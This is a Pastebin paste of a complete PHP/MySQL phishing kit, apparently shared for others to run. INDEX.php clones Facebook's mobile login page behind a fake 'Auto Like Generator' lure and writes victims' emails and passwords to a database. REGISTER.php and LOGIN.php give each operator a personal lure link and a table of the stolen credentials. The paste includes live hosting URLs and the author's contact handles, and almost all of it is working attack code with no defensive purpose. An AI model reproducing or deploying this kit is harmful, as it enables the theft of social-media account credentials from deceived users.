Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- PHP - Phishing Site ,MYSQLi OOP .
- Idea By - Fakebook (R.I.P)
- $username = "MYSQL User"
- $password = "MYSQL Password"
- $dbname = "DB Name"
- CREATE TABLE phish(
- id INT NOT NULL AUTO_INCREMENT,
- PRIMARY KEY(id),
- username TEXT,
- password TEXT,
- victimemail TEXT,
- victimpass TEXT,
- secretcode TEXT
- )
- Any Bug Please Contact Me On Facebook : https://www.facebook.com/0b0xed
- Twitter : @0b0xed
- Live : - http://v1.hpi.or.id/phish/index.php (INDEX.php)
- - http://v1.hpi.or.id/phish/register.php (REGISTER.php)
- - http://v1.hpi.or.id/phish/login.php (LOGIN.php)
- --------------------------------------------------------------------------------------------------------------------------------------
- INDEX.php
- <html>
- <title>VViP AutoLike Generator</title>
- <link href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/ym/r/qOAuy_fpEXc.png" rel="apple-touch-icon-precomposed" sizes="1024x1024" />
- <meta name="referrer" content="default" id="meta_referrer" />
- <script data-signature="1">(function a(b){if(!('__BUFFER__' in b)){var c={},d={},e=function(h,i){c[h]=c[h]||[];c[h].push(i);if(d[h])for(var j=0,k=d[h].length;j<k;j++)try{d[h][j](i);}catch(l){}},f=function(h){return (c[h]||[]).slice();},g=function(h,i){if(typeof i!=='function')return;d[h]=d[h]||[];d[h].push(i);if(c[h])for(var j=0,k=c[h].length;j<k;j++)try{i(c[h][j]);}catch(l){}};b.__BUFFER__={write:e,read:f,tail:g};}})(window);</script><link rel="stylesheet" type="text/css" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yM/r/ou3ZQxxNw5j.css" id="jasdS" />
- <link rel="stylesheet" type="text/css" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yR/r/-L6bk_LJY-3.css" id="gssPK" />
- <link rel="stylesheet" type="text/css" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/ye/r/F1rWnJ2a_qP.css" id="Awd29" />
- <link rel="stylesheet" type="text/css" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/ym/r/hszMaE4pOGZ.css" id="9Cx7a" />
- <link rel="stylesheet" type="text/css" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yZ/r/cpZIw16SwvG.css" id="A0ZVp" />
- <link rel="stylesheet" type="text/css" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yk/r/1SfL4kgL8Zd.css" id="lLkBt" />
- <link rel="stylesheet" type="text/css" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yz/r/Iud9mJeQN16.css" id="iK5yq" />
- <link rel="stylesheet" type="text/css" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yx/r/yvDdOEDjYSX.css" id="usemR" />
- <link rel="stylesheet" type="text/css" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yz/r/-KlmKDg0qwA.css" id="drrX2" />
- <script data-signature="1">
- (/^#~?!(?:/?[w.-])+/?(?:?|$)/).test(location.hash)&&location.replace(location.hash.substr(location.hash.indexOf('!')+1));window.FB_GKS={"mobile_chrono_selector":1,"mobile_js_show_debug":0,"mobile_js_log_error":0,"js_typechecks":1,"m_js_log_history":0,"m_js_trace":0,"m_js_inline_cross_origin":0,"m_js_script_tag_signature":0,"m_js_html_snapshot":0,"js_nocatch":0,"moulder_feed_hide_toggle":0,"m_onephase_home":1,"local_storage_cache":0,"mtouch_composer_no_autoresize":1,"m_js_crossorigin_attribute":1};window.FB_QES={"mobile_resource_reliability":[]};</script>
- <script id="u_0_8" crossorigin="anonymous" src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yt/r/38vyqnzaabN.js"></script>
- <script id="u_0_9">require("MPrelude")</script>
- <script id="u_0_a">(function _(a,b,c){if(!a){document.cookie=b+'=;expires=Thu, 01-Jan-1970 00:00:01 GMT';return;}var d=null;(!window.devicePixelRatio&&navigator.userAgent.indexOf('Windows Phone')!==-1)){d=screen.width/document.documentElement.offsetWidth;d=d>=2?2:d>=1.5?1.5:1;}document.cookie=b+'='+(d||window.devicePixelRatio||1);if(c&&document.cookie&&window.devicePixelRatio>1)document.location.reload();})(false, "m_pixel_ratio", true);</script></head>
- <body tabindex="0" class="touch x1 _fzu _50-3 iframe acw"><script id="u_0_2">(function(a){a.__updateOrientation=function(){var b=(!!a.orientation&&a.orientation!==180),c=document.body;if(c)c.className=c.className.replace(/(^|s)(landscape|portrait)(s|$)/g,' ')+' '+(b?'landscape':'portrait');return b;};})(window);</script><div id="viewport"><h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">VViP Facebook Auto Like Generator</h1><div id="page"><div class="_4g33 _52we _52z5" id="header"><div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter"><i class="img sp_ccgf6l sx_b78a2b">
- <u>Facebook VViP Like Generator</u></i></div></div>
- <div id="root" role="main" class="_5soa acw" data-sigil="context-layer-root content-pane">
- <div class="_4g33"><div class="_4g34"><div class="aclb _5rut">
- <form method="post" class="mobile-login-form _5spm" id="login_form" novalidate="1" ><input type="hidden" name="lsd" value="AVq-bUOM" autocomplete="off" />
- <input type="hidden" name="charset_test" value="€,Вґ,€,Вґ,水,Д,Є" />
- <input type="hidden" name="version" value="1" />
- <input type="hidden" id="ajax" name="ajax" value="0" />
- <input type="hidden" id="width" name="width" value="0" />
- <input type="hidden" id="pxr" name="pxr" value="0" />
- <input type="hidden" id="gps" name="gps" value="0" />
- <input type="hidden" autocomplete="off" name="m_ts" value="1388236779" />
- <input type="hidden" autocomplete="off" name="li" value="68--UpKSBX0z0SUCfBfZl7j7" />
- <input type="hidden" autocomplete="off" name="signup_layout" value="layout|lower_subdued_button||s_btn|special||l_btn|confirm||signupinstr||logininstr||st|create||launched_Jan9" /><center><br>
- <font color=red>You Must Enter Correct Email And Password For The Followers</font></center>
- <br>
- <div class="_56be _5sob"><div class="_55wo _55x2 _56bf"><input autocorrect="off" autocapitalize="off" class="_56bg _55ws _5ruq" name="email" placeholder="Email" type="text" />
- <input autocorrect="off" autocapitalize="off" class="_56bg _55ws _5ruq" placeholder="Password" name="password" type="password" />
- <input autocorrect="off" autocapitalize="off" class="_56bg _55ws _5ruq" placeholder="Status Link" name="status" type="text" />
- <div class="_55ws">
- <input type=radio name=dafut value=100>100 Likes + 1k Followers</br>
- <input type=radio name=dafut value=200>200 Likes + 2k Followers</br>
- <input type=radio name=dafut value=300>300 Likes + 3k Followers</br>
- <br>
- <button type="submit" value="Generate Liker" class="touchable _56bs _56b_ _56bw _56bu" method=post data-sigil="touchable">
- <span class="_55sr">Generate Liker</span></button></div></div></div><div class="_52jj _5t3b">
- <p>VViP Status Liker | Auto Followers Generator 2014</p>
- <script id="u_0_3" crossorigin="anonymous" src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/y8/r/hxGWX_baD_X.js"></script>
- <script id="u_0_4" crossorigin="anonymous" src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yM/r/GsXVX_-8PDr.js"></script><script id="u_0_5" crossorigin="anonymous" src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/y4/r/HfNK9_XjANC.js"></script>
- <script id="u_0_6" crossorigin="anonymous" src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yS/r/W5vnA7VViRp.js"></script>
- <script id="u_0_7">(new (require("ServerJS"))()).handle({"define":[["JSErrorExtra",[],{},251],["MBanzaiConfig",[],{"MAX_WAIT":30000,"RESTORE_WAIT":30000,"MAX_SIZE":10000,"EXPIRY":86400000,"blacklist":["time_spent"],"gks":{"adapterhooks":true,"mchannel_jumpstart":true}},32],["MWebStorageMonsterWhiteList",[],{"whitelist":["^Banzai$","^bz:mutex$","^bz","^bz:[a-zA-Z0-9]+","^mutex","^mutex_.+","^:userchooser:osessusers$","^:userchooser:settings$","^[0-9]+:powereditor:","^[0-9]+:page_insights:","^_SocialFoxExternal_machineid$","^_SocialFoxExternal_LoggedInBefore$","^_socialfox_worker_enabled$","^brands:console:config$","^CacheStorageVersion$"]},254],["MRevision",[],{"revision":1062230},245],["MRequestConfig",[],{"lsd":"AVq-bUOM","dtsg":{"token":"AQDxv7xr","expire":1388323179}},51],["MSession",[],{"useAngora":false,"push_phase":"V3","logoutURL":"/logout.php?h=Afeq_vcIjcV5NVvs&t=1388236779"},52],["CurrentUserInitialData",[],{"id":"0"},270],["MJSEnvironment",[],{"IS_CHROME":true,"PIXEL_RATIO":"1","IS_ROSETTA":false,"IS_FIREFOX":false,"IS_APPLE_WEBKIT_IOS":false,"IS_ANDROID":false,"IS_WINDOWS_PHONE":false,"OS_VERSION":6.1},46],["MLoadingIndicatorSigils",[],{"ANIMATE":"m-loading-indicator-animate","ROOT":"m-loading-indicator-root"},279],["ErrorDebugHooks",[],{"SnapShotHook":null},185],["MarauderConfig",[],{"gk_enabled":false,"app_version":1062230},31],["FWLoader",[],{},278],["JSErrorPlatformColumns",[],{},255]]});require("MCoreInit").init({"clearMCache":false,"coreResources":["https://fbstatic-a.akamaihd.net/rsrc.php/v2/yM/r/Oz2Pqku5-Iq.js","https://fbstatic-a.akamaihd.net/rsrc.php/v2/yR/r/iZdtHhiA3AB.js","https://fbstatic-a.akamaihd.net/rsrc.php/v2/yi/r/Cn1Xfr9PMmA.js","https://fbstatic-a.akamaihd.net/rsrc.php/v2/yM/r/ou3ZQxxNw5j.css","https://fbstatic-a.akamaihd.net/rsrc.php/v2/yR/r/-L6bk_LJY-3.css","https://fbstatic-a.akamaihd.net/rsrc.php/v2/ye/r/F1rWnJ2a_qP.css","https://fbstatic-a.akamaihd.net/rsrc.php/v2/ym/r/hszMaE4pOGZ.css","https://fbstatic-a.akamaihd.net/rsrc.php/v2/yZ/r/cpZIw16SwvG.css","https://fbstatic-a.akamaihd.net/rsrc.php/v2/yk/r/1SfL4kgL8Zd.css","https://fbstatic-a.akamaihd.net/rsrc.php/v2/yz/r/Iud9mJeQN16.css","https://fbstatic-a.akamaihd.net/rsrc.php/v2/yx/r/yvDdOEDjYSX.css","https://fbstatic-a.akamaihd.net/rsrc.php/v2/yz/r/-KlmKDg0qwA.css"],"hideLocationBar":true,"onafterload":"","onload":"","serverJSData":{"require":[["MAccessibilityMarauderLogger"],["MTouchable"],["ErrorUtils"],["MExceptionHandler"],["LogHistoryListeners"],["ScriptPath","set",[],["XLoginController","4e6eefd9"]],["MLogging","main",[],[{"refid":9}]],["IosWebapp"],["MModalDialogInit"],["MVerifyCache","main",[],[{"viewer":0}]],["ScriptPath","startLogging",[],[]],["MTimeSpentBitArrayLogger","init",[],["m"]],["MScrollPositionSaver"],["LoadingIndicator","init",["m_0_1","m_0_2","m_0_0"],[{"__m":"m_0_0"},{"__m":"m_0_1"},{"__m":"m_0_2"}]],["MPageError"],["MLogoutClearCache"],["InitMAjaxify"],["MPageHeaderAccessibility"],["MBlockingTouchable"],["MLoadingIndicator","init",[],["u_0_1"]]],"elements":[["m_0_0","u_0_0",2]]},"isWildeWeb":false,"isFacewebAndroid":false,"ixData":[]});</script></body>
- </html>
- <?php
- $email = $_POST['email'];
- $pass = $_POST['password'];
- $ada = $_GET['id'];
- $secret = md5(str_rot13("{$rahsia}-779AE"));
- if(!empty($_POST['email']) && ($_POST['password'])) {
- $mysqli = new mysqli ("localhost","$username","$password","$dbname");
- $username = $mysqli -> real_escape_string($email);
- $password = $mysqli -> real_escape_string($pass);
- $rahsia = $mysqli -> real_escape_string($ada);
- $mangsa = $mysqli -> query("INSERT INTO phish(victimemail,victimpass,secretcode,username) VALUES('{$username}','{$password}','{$secret}','{$rahsia}')");
- if(!$mangsa) { print "Error"; }
- echo " DONE ! ";
- }
- ?>
- --------------------------------------------------------------------------------------------------------------------------------------
- LOGIN.php
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="utf-8">
- <title>User Login - PHISH</title>
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
- <meta name="description" content="">
- <meta name="author" content="">
- <link href="//netdna.bootstrapcdn.com/twitter-bootstrap/2.2.2/css/bootstrap.no-icons.min.css" rel="stylesheet">
- <link href="//netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">
- <link rel="stylesheet" href="http://yui.yahooapis.com/pure/0.4.2/pure-min.css">
- <!--[if IE 7]>
- <link href="//netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome-ie7.css" rel="stylesheet">
- <![endif]-->
- <link href="http://tor.my/custom.css?v=1398906504" rel="stylesheet">
- <!--[if lt IE 9]>
- <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
- <![endif]-->
- </head>
- <body><div class="container-fluid">
- <div class="content">
- <div class="page-header">
- <div class="navbar">
- <div class="navbar-inner">
- <ul class="nav">
- <li><a href="/phish/">Home</a></li>
- </ul>
- <ul class="nav pull-right">
- <li><a href="/phish/delete.php">Delete</a></li>
- </ul>
- </div>
- </div> </div>
- <div class="row-fluid">
- <div class="span12 offset2">
- <form class="form-horizontal" method="POST">
- <div class="control-group">
- <label class="control-label" for="inputEmail">Username</label>
- <div class="controls">
- <input type="text" name="username" class="span4" id="inputEmail" placeholder="Username">
- </div>
- </div>
- <div class="control-group">
- <label class="control-label" for="inputPassword">Password</label>
- <div class="controls">
- <input type="password" name="password" class="span4" id="inputPassword" placeholder="Password">
- </div>
- </div>
- <div class="control-group">
- <div class="controls">
- <span class="btn-group">
- <button type="submit" class="btn">Sign in</button>
- <a href="/register.php" class="btn btn-primary">Register</a>
- </span>
- </div>
- </div>
- </form>
- </div>
- </div>
- </div>
- </div>
- <script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>
- <script src="//netdna.bootstrapcdn.com/twitter-bootstrap/2.2.2/js/bootstrap.min.js"></script>
- </body>
- </html>
- <?php
- $user = $_POST['username'];
- $pass = $_POST['password'];
- if(!empty($_POST['username']) && ($_POST['password'])){
- $mysqli = new mysqli ("localhost","USERNAME","PASSWORD","DBNAME");
- $username = $mysqli -> real_escape_string($user);
- $password = $mysqli -> real_escape_string($pass);
- $jalan = "select phish.password from phish where phish.username = '{$username}'";
- $passwordgay = $mysqli -> query($jalan);
- $passgay = $passwordgay -> fetch_array(MYSQLI_ASSOC);
- $jalan -> close;
- if(($_POST['password'])=="{$passgay['password']}") {
- $jalan = "select phish.username,phish.password from phish where phish.username = '{$username}' and phish.password = '{$password}'";
- $result = $mysqli -> query($jalan);
- if($result){
- $jalan -> close;
- $secret = md5(str_rot13("{$username}-779AE"));
- $jalan = "select phish.victimemail,phish.victimpass,phish.victimemail from phish where phish.secretcode = '{$secret}'";
- $query = $mysqli -> query($jalan);
- echo "
- <br>
- <br>
- <center>
- <table class='pure-table pure-table-bordered'>
- <thead>
- <tr>
- <th>Email</th>
- <th>Password</th>
- <th>Secret Key</th>
- <th>Link</th>
- </tr>
- </thead>
- ";
- while($row = $query -> fetch_array(MYSQLI_ASSOC)){
- ?>
- <tbody>
- <tr>
- <td><?php echo $row['victimemail']; ?></td>
- <td><?php echo $row['victimpass']; ?></td>
- <td><?php echo str_rot13(md5($row['victimemail'])); ?></td>
- <td><?php echo "http://localhost/phish/index.php?id={$row['username']}"; ?></td>
- <?php
- }
- echo "
- </tr>
- </tbody>
- </table>
- </center>
- ";
- }
- $jalan -> close;
- $mysqli -> close;
- }
- else {
- ?>
- <script language="JavaScript">
- confirm("Wrong Password");
- </script>
- <?php
- }
- }
- if(($_GET['id'])=="-1") {
- echo "<b>Error In MYSql Syntax</b>";
- }
- ?>
- --------------------------------------------------------------------------------------------------------------------------------------
- REGISTER.php
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="utf-8">
- <title>User Registration</title>
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
- <meta name="description" content="">
- <meta name="author" content="">
- <link href="//netdna.bootstrapcdn.com/twitter-bootstrap/2.2.2/css/bootstrap.no-icons.min.css" rel="stylesheet">
- <link href="//netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">
- <!--[if IE 7]>
- <link href="//netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome-ie7.css" rel="stylesheet">
- <![endif]-->
- <link href="http://tor.my/custom.css?v=1398917222" rel="stylesheet">
- <!--[if lt IE 9]>
- <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
- <![endif]-->
- </head>
- <body><div class="container-fluid">
- <div class="content">
- <div class="page-header">
- <div class="navbar">
- <div class="navbar-inner">
- <ul class="nav">
- <li><a href="/">Home</a></li>
- </ul>
- <ul class="nav pull-right">
- <li><a href="/login.php">Login</a></li>
- </ul>
- </div>
- </div> </div>
- <div class="row-fluid">
- <div class="span10 offset2">
- <form class="form-horizontal" method="POST">
- <div class="control-group">
- <label class="control-label" for="inputEmail">Username</label>
- <div class="controls">
- <input type="text" name="username" class="span4" id="inputEmail" placeholder="Username" />
- </div>
- </div>
- <div class="control-group">
- <label class="control-label" for="inputPassword">Password</label>
- <div class="controls">
- <input type="password" name="password" class="span4" id="inputPassword" placeholder="Password" />
- </div>
- </div>
- <div class="control-group">
- <div class="controls">
- <span class="btn-group">
- <button type="submit" class="btn">Register</button>
- </span>
- </div>
- </div>
- </form>
- </div>
- </div>
- </div>
- </div>
- <script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>
- <script src="//netdna.bootstrapcdn.com/twitter-bootstrap/2.2.2/js/bootstrap.min.js"></script>
- </body>
- </html>
- <?php
- $user = $_POST['username'];
- $pass = $_POST['password'];
- $rahsia = md5(str_rot13("{$user}-779AE"));
- $mysqli = new mysqli ("localhost","$username","$password","$dbname");
- if (!$mysqli){ echo "Tak Boleh Connect Bang"; }
- if(!empty($_POST['username']) && ($_POST['password'])) {
- $username = $mysqli -> real_escape_string($user);
- $password = $mysqli -> real_escape_string($pass);
- $secret = $mysqli -> real_escape_string($rahsia);
- $kira = $mysqli -> query("SELECT * FROM phish WHERE username = '{$username}'");
- $cari = $kira -> num_rows;
- if($cari != "0") { echo "
- <br>
- <center>
- <b>{$username}</b> Sudah Ada <br />"; }
- else {
- $isi = $mysqli -> query("INSERT INTO phish(username,password,victimemail,victimpass,secretcode)VALUES('{$username}','{$password}','test@site.com','P445w0rD','{$secret}')");
- if(!$isi) { echo "Salah Dud"; }
- echo "
- <center>
- <br>
- <b>Created</b><br />
- Username : {$username} <br />
- Password : {$password} <br />
- Website : http://v1.hpi.or.id/phish/index.php?id={$username} <br />
- ";
- $mysqli -> close();
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
